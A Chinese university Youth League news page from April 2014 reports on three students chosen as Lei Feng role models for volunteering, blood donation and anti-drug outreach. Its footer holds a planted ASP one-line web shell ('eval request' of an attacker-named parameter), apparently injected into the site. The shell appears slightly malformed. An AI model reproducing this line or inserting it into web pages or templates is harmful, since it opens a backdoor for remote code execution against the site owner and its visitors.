当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
易班闪耀我校学生雷锋楷模风采
[2014年04月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    “敬礼雷锋·向上向善进行时”全国大学生道德实践成果网络巡礼活动于3月1日至3月20日举行,活动由教育部思想政治工作司、国家互联网信息办公室网络新闻宣传局指导,全国高校校园网站联盟主办,易班网、中国大学生在线、人民网、新浪网、腾讯网承办。

    本次活动由雷锋楷模评选专题活动、新浪腾讯微博“微话题”互动讨论、微信朋友圈宣传分享以及各高校雷锋道德实践活动四个部分组成。我校易班发展中心积极组织、深度挖掘,指导学生完善材料、凸显风采。在易班的投票评比中,我校海洋科学学院2011级海洋管理专业宋宝丽、食品学院2010级食品科学与工程专业万慧珊、人文学院2013级社会工作专业王梓怡三位学生脱颖而出,获评雷锋楷模(共10位),她们的事迹在易班上引发广泛共鸣,得到了众多网友的称赞。

    “雷锋是从平凡小事做起的公民道德样本。学雷锋,学的是精神,见的是行动”,热心公益、服务社会的宋宝丽同学在各类志愿服务活动中总是以雷锋同志为榜样,严格要求自己,以身作则,为志愿服务和公益活动尽心尽力,以实际行动践行着“人道、博爱、奉献”的红十字精神;万慧珊同学在“志愿我践行、奉献助成长”雷锋宣言的感召下,累计献血1100cc、远赴江西山村支教,在各类志愿行动中热情地贡献着海大学子的力量;作为一名光荣的禁毒志愿者,王梓怡同学一直在为铲除毒品这个万恶的毒瘤而贡献自己的力量,通过发放禁毒宣传资料,普及禁毒法规政策、全社会的禁毒职责、新型毒品的危害等各种相关知识,她在用自己的实际行动提高广大人民群众识毒、防毒和拒毒的意识。三位同学只是我校众多学雷锋同学的代表,希望雷锋楷模光芒能持续闪耀海大校园!

 

关闭窗口

上一篇:我校举行国际安全形势报告会

下一篇:俄罗斯专家Anatoly Sagalevitch教授来校访问
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>